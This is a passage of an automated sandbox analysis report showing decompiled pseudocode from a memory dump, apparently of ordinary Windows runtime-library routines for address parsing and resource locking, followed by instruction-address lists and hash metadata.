											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E008F0CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E008F0CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E008F06BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E008F06BA(_t124, _t142) == 0 || E008F0A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                                                                                                                              0x008f0b21
                                                                                                                                                              0x008f0b24
                                                                                                                                                              0x008f0b27
                                                                                                                                                              0x008f0b2a
                                                                                                                                                              0x008f0b2d
                                                                                                                                                              0x008f0b30
                                                                                                                                                              0x008f0b33
                                                                                                                                                              0x008f0b36
                                                                                                                                                              0x008f0b39
                                                                                                                                                              0x008f0b3e
                                                                                                                                                              0x008f0c65
                                                                                                                                                              0x008f0c68
                                                                                                                                                              0x008f0c6a
                                                                                                                                                              0x008f0c6f
                                                                                                                                                              0x0091eb42
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091eb48
                                                                                                                                                              0x0091eb48
                                                                                                                                                              0x008f0c75
                                                                                                                                                              0x008f0c7a
                                                                                                                                                              0x0091eb54
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091eb5a
                                                                                                                                                              0x008f0c80
                                                                                                                                                              0x008f0c84
                                                                                                                                                              0x0091eb98
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091eba6
                                                                                                                                                              0x008f0cb8
                                                                                                                                                              0x008f0cba
                                                                                                                                                              0x008f0cd3
                                                                                                                                                              0x008f0cda
                                                                                                                                                              0x008f0ce4
                                                                                                                                                              0x008f0ce9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008f0cec
                                                                                                                                                              0x008f0c8c
                                                                                                                                                              0x0091eb63
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091eb70
                                                                                                                                                              0x0091eb75
                                                                                                                                                              0x0091eb7d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091eb8c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091eb8c
                                                                                                                                                              0x008f0c96
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008f0ca2
                                                                                                                                                              0x008f0cac
                                                                                                                                                              0x008f0cb4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008f0b44
                                                                                                                                                              0x008f0b47
                                                                                                                                                              0x008f0b49
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008f0b4f
                                                                                                                                                              0x008f0b50
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008f0b56
                                                                                                                                                              0x008f0b62
                                                                                                                                                              0x008f0b7c
                                                                                                                                                              0x008f0bac
                                                                                                                                                              0x008f0a0f
                                                                                                                                                              0x0091eaaa
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091eac4
                                                                                                                                                              0x0091eac4
                                                                                                                                                              0x008f0bd0
                                                                                                                                                              0x008f0bd0
                                                                                                                                                              0x008f0bd4
                                                                                                                                                              0x008f0bd9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008f0bdb
                                                                                                                                                              0x008f0be0
                                                                                                                                                              0x0091eb0e
                                                                                                                                                              0x008f0a1a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008f0a1a
                                                                                                                                                              0x0091eb1a
                                                                                                                                                              0x0091eb1f
                                                                                                                                                              0x0091eb27
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091eb36
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091eb36
                                                                                                                                                              0x008f0bea
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008f0bf6
                                                                                                                                                              0x008f0c00
                                                                                                                                                              0x008f0c03
                                                                                                                                                              0x008f0c0b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008f0c0b
                                                                                                                                                              0x0091eaaa
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008f0a15
                                                                                                                                                              0x008f0bb6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008f0bc6
                                                                                                                                                              0x008f0bc6
                                                                                                                                                              0x008f0bcb
                                                                                                                                                              0x008f0c15
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008f0c1d
                                                                                                                                                              0x008f0c20
                                                                                                                                                              0x008f0c21
                                                                                                                                                              0x008f0c24
                                                                                                                                                              0x008f0c24
                                                                                                                                                              0x008f0c26
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008f0c26
                                                                                                                                                              0x008f0bcd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008f0bcd
                                                                                                                                                              0x008f0b89
                                                                                                                                                              0x008f0b89
                                                                                                                                                              0x008f0b90
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008f0b96
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008f0b96
                                                                                                                                                              0x008f0a04
                                                                                                                                                              0x008f0a04
                                                                                                                                                              0x008f0b9a
                                                                                                                                                              0x008f0b9a
                                                                                                                                                              0x008f0b9b
                                                                                                                                                              0x008f0b9f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008f0ba5
                                                                                                                                                              0x008f0ac7
                                                                                                                                                              0x008f0aca
                                                                                                                                                              0x0091eacf
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091eade
                                                                                                                                                              0x0091eade
                                                                                                                                                              0x0091eae3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091eaf3
                                                                                                                                                              0x0091eaf6
                                                                                                                                                              0x0091eaf7
                                                                                                                                                              0x0091eafe
                                                                                                                                                              0x0091eb01
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091eb01
                                                                                                                                                              0x0091eacf
                                                                                                                                                              0x008f0ad0
                                                                                                                                                              0x008f0ad4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008f0ada
                                                                                                                                                              0x008f0ae6
                                                                                                                                                              0x008f0c34
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008f0c47
                                                                                                                                                              0x008f0c49
                                                                                                                                                              0x008f0c4a
                                                                                                                                                              0x008f0c4e
                                                                                                                                                              0x008f0c51
                                                                                                                                                              0x008f0c54
                                                                                                                                                              0x008f0c57
                                                                                                                                                              0x008f0c5a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008f0c60
                                                                                                                                                              0x008f0afb
                                                                                                                                                              0x008f0afe
                                                                                                                                                              0x008f0b02
                                                                                                                                                              0x008f0b05
                                                                                                                                                              0x008f0b08
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008f0b08
                                                                                                                                                              0x008f0ae6
                                                                                                                                                              0x008f0b44
                                                                                                                                                              0x008f09f8
                                                                                                                                                              0x008f09f8
                                                                                                                                                              0x008f09f9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091eaa0
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000010.00000002.2299696361.00000000008A0000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true
                                                                                                                                                              • Associated: 00000010.00000002.2299683867.0000000000890000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299804221.0000000000980000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299812761.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299833424.0000000000994000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299855126.0000000000997000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299872905.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299932807.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __fassign
                                                                                                                                                              • String ID: .$:$:
                                                                                                                                                              • API String ID: 3965848254-2308638275
                                                                                                                                                              • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                              • Instruction ID: 7d6e3ca3dca86c0b4cc18acd2228e3998dbfe8bfdf6142f83a436b443f965dd6
                                                                                                                                                              • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                              • Instruction Fuzzy Hash: BFA17971D0420EEFCF248F78C8456BEB7B4FB05315F24856ADA46E7283E6349A818F52
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 008F0554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                              			E008F0554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009901c0;
									_push(_t144);
									_push(0);
									_t51 = E008AF8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E008F4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00903F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00903F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0093217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00903F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E008F3915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009901c0;
												_push(_t138);
												_push(0);
												_t58 = E008AF8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E008F4FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00903F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00903F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0093217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00903F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E008F3915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E008D5384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E008AF970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E008F3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E008AF970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E008F3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E008AF970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E008F3915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E008D5329(_t110, _t138);
																_t69 = E008D53A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                                                                                                                              0x008f055a
                                                                                                                                                              0x008f055d
                                                                                                                                                              0x008f0563
                                                                                                                                                              0x008f0566
                                                                                                                                                              0x008f05d8
                                                                                                                                                              0x008f05e2
                                                                                                                                                              0x008f05e5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008f05e7
                                                                                                                                                              0x008f05e7
                                                                                                                                                              0x008f05ea
                                                                                                                                                              0x008f05f3
                                                                                                                                                              0x008f05f3
                                                                                                                                                              0x008f0568
                                                                                                                                                              0x008f0568
                                                                                                                                                              0x008f0568
                                                                                                                                                              0x008f0569
                                                                                                                                                              0x008f0569
                                                                                                                                                              0x008f0569
                                                                                                                                                              0x008f056b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091217f
                                                                                                                                                              0x00912183
                                                                                                                                                              0x0091225b
                                                                                                                                                              0x0091225f
                                                                                                                                                              0x00912189
                                                                                                                                                              0x0091218c
                                                                                                                                                              0x0091218f
                                                                                                                                                              0x00912194
                                                                                                                                                              0x00912199
                                                                                                                                                              0x0091219d
                                                                                                                                                              0x009121a0
                                                                                                                                                              0x009121a2
                                                                                                                                                              0x009121ce
                                                                                                                                                              0x009121ce
                                                                                                                                                              0x009121ce
                                                                                                                                                              0x009121d0
                                                                                                                                                              0x009121d6
                                                                                                                                                              0x009121de
                                                                                                                                                              0x009121e2
                                                                                                                                                              0x009121e8
                                                                                                                                                              0x009121e9
                                                                                                                                                              0x009121ec
                                                                                                                                                              0x009121f1
                                                                                                                                                              0x009121f6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009121f8
                                                                                                                                                              0x009121fb
                                                                                                                                                              0x00912206
                                                                                                                                                              0x0091220b
                                                                                                                                                              0x0091220c
                                                                                                                                                              0x00912217
                                                                                                                                                              0x00912226
                                                                                                                                                              0x0091222b
                                                                                                                                                              0x0091222c
                                                                                                                                                              0x0091222f
                                                                                                                                                              0x00912232
                                                                                                                                                              0x00912235
                                                                                                                                                              0x00912235
                                                                                                                                                              0x0091223a
                                                                                                                                                              0x0091223f
                                                                                                                                                              0x00912241
                                                                                                                                                              0x00912243
                                                                                                                                                              0x00912248
                                                                                                                                                              0x00912248
                                                                                                                                                              0x0091224d
                                                                                                                                                              0x0091224f
                                                                                                                                                              0x00912262
                                                                                                                                                              0x00912263
                                                                                                                                                              0x00912268
                                                                                                                                                              0x00912269
                                                                                                                                                              0x00912269
                                                                                                                                                              0x00912269
                                                                                                                                                              0x0091226d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00912276
                                                                                                                                                              0x00912279
                                                                                                                                                              0x0091227e
                                                                                                                                                              0x00912283
                                                                                                                                                              0x00912287
                                                                                                                                                              0x0091228a
                                                                                                                                                              0x0091228d
                                                                                                                                                              0x0091228f
                                                                                                                                                              0x009122bc
                                                                                                                                                              0x009122bc
                                                                                                                                                              0x009122bc
                                                                                                                                                              0x009122be
                                                                                                                                                              0x009122c4
                                                                                                                                                              0x009122cc
                                                                                                                                                              0x009122d0
                                                                                                                                                              0x009122d6
                                                                                                                                                              0x009122d7
                                                                                                                                                              0x009122da
                                                                                                                                                              0x009122df
                                                                                                                                                              0x009122e4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009122e6
                                                                                                                                                              0x009122e9
                                                                                                                                                              0x009122f4
                                                                                                                                                              0x009122f9
                                                                                                                                                              0x009122fa
                                                                                                                                                              0x00912305
                                                                                                                                                              0x00912314
                                                                                                                                                              0x00912319
                                                                                                                                                              0x0091231a
                                                                                                                                                              0x0091231d
                                                                                                                                                              0x00912320
                                                                                                                                                              0x00912323
                                                                                                                                                              0x00912323
                                                                                                                                                              0x00912328
                                                                                                                                                              0x0091232d
                                                                                                                                                              0x0091232f
                                                                                                                                                              0x00912331
                                                                                                                                                              0x00912336
                                                                                                                                                              0x00912336
                                                                                                                                                              0x0091233b
                                                                                                                                                              0x0091233d
                                                                                                                                                              0x00912350
                                                                                                                                                              0x00912351
                                                                                                                                                              0x00912356
                                                                                                                                                              0x00912359
                                                                                                                                                              0x00912359
                                                                                                                                                              0x0091235b
                                                                                                                                                              0x0091235d
                                                                                                                                                              0x008d5367
                                                                                                                                                              0x008d536b
                                                                                                                                                              0x008d5372
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00912363
                                                                                                                                                              0x00912363
                                                                                                                                                              0x00912369
                                                                                                                                                              0x0091236a
                                                                                                                                                              0x0091236c
                                                                                                                                                              0x00912371
                                                                                                                                                              0x00912373
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00912379
                                                                                                                                                              0x00912379
                                                                                                                                                              0x0091237a
                                                                                                                                                              0x0091237f
                                                                                                                                                              0x0091237f
                                                                                                                                                              0x00912385
                                                                                                                                                              0x00912386
                                                                                                                                                              0x00912389
                                                                                                                                                              0x0091238e
                                                                                                                                                              0x00912390
                                                                                                                                                              0x008d5378
                                                                                                                                                              0x008d537c
                                                                                                                                                              0x00912396
                                                                                                                                                              0x00912396
                                                                                                                                                              0x00912397
                                                                                                                                                              0x0091239c
                                                                                                                                                              0x009123a2
                                                                                                                                                              0x009123a3
                                                                                                                                                              0x009123a6
                                                                                                                                                              0x009123ab
                                                                                                                                                              0x009123ad
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009123b3
                                                                                                                                                              0x009123b3
                                                                                                                                                              0x009123b4
                                                                                                                                                              0x009123b9
                                                                                                                                                              0x009123ba
                                                                                                                                                              0x009123ba
                                                                                                                                                              0x009123bc
                                                                                                                                                              0x009123bf
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00909153
                                                                                                                                                              0x00909158
                                                                                                                                                              0x0090915a
                                                                                                                                                              0x0090915e
                                                                                                                                                              0x00909160
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00909166
                                                                                                                                                              0x00909166
                                                                                                                                                              0x00909171
                                                                                                                                                              0x00909176
                                                                                                                                                              0x00909176
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00909160
                                                                                                                                                              0x009123c6
                                                                                                                                                              0x009123ce
                                                                                                                                                              0x009123d7
                                                                                                                                                              0x009123d7
                                                                                                                                                              0x009123ad
                                                                                                                                                              0x00912390
                                                                                                                                                              0x00912373
                                                                                                                                                              0x0091233f
                                                                                                                                                              0x0091233f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091233f
                                                                                                                                                              0x00912291
                                                                                                                                                              0x00912291
                                                                                                                                                              0x00912293
                                                                                                                                                              0x00912295
                                                                                                                                                              0x0091229a
                                                                                                                                                              0x009122a1
                                                                                                                                                              0x009122a3
                                                                                                                                                              0x009122a7
                                                                                                                                                              0x009122a9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009122ab
                                                                                                                                                              0x009122ad
                                                                                                                                                              0x009122af
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009122af
                                                                                                                                                              0x009122b1
                                                                                                                                                              0x009122b4
                                                                                                                                                              0x009122b4
                                                                                                                                                              0x009122b6
                                                                                                                                                              0x008d53be
                                                                                                                                                              0x008d53be
                                                                                                                                                              0x008d53be
                                                                                                                                                              0x008d53c0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008d53cb
                                                                                                                                                              0x008d53ce
                                                                                                                                                              0x008d53d0
                                                                                                                                                              0x008d53d4
                                                                                                                                                              0x008d53d6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008d53d8
                                                                                                                                                              0x008d53e3
                                                                                                                                                              0x008d53ea
                                                                                                                                                              0x008d53ea
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008d53d6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009122b6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091228f
                                                                                                                                                              0x00912349
                                                                                                                                                              0x0091234d
                                                                                                                                                              0x00912251
                                                                                                                                                              0x00912251
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00912251
                                                                                                                                                              0x009121a4
                                                                                                                                                              0x009121a4
                                                                                                                                                              0x009121a6
                                                                                                                                                              0x009121a8
                                                                                                                                                              0x009121ac
                                                                                                                                                              0x009121b6
                                                                                                                                                              0x009121b8
                                                                                                                                                              0x009121bc
                                                                                                                                                              0x009121be
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009121c0
                                                                                                                                                              0x009121c2
                                                                                                                                                              0x009121c4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009121c4
                                                                                                                                                              0x009121c6
                                                                                                                                                              0x009121c6
                                                                                                                                                              0x009121c8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009121c8
                                                                                                                                                              0x009121a2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00912183
                                                                                                                                                              0x008f057b
                                                                                                                                                              0x008f057d
                                                                                                                                                              0x008f0581
                                                                                                                                                              0x008f0583
                                                                                                                                                              0x00912178
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008f0589
                                                                                                                                                              0x008f058f
                                                                                                                                                              0x008f058f
                                                                                                                                                              0x008f0583
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00912206
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000010.00000002.2299696361.00000000008A0000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true
                                                                                                                                                              • Associated: 00000010.00000002.2299683867.0000000000890000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299804221.0000000000980000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299812761.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299833424.0000000000994000.00000040.00000001.sdmp Download File
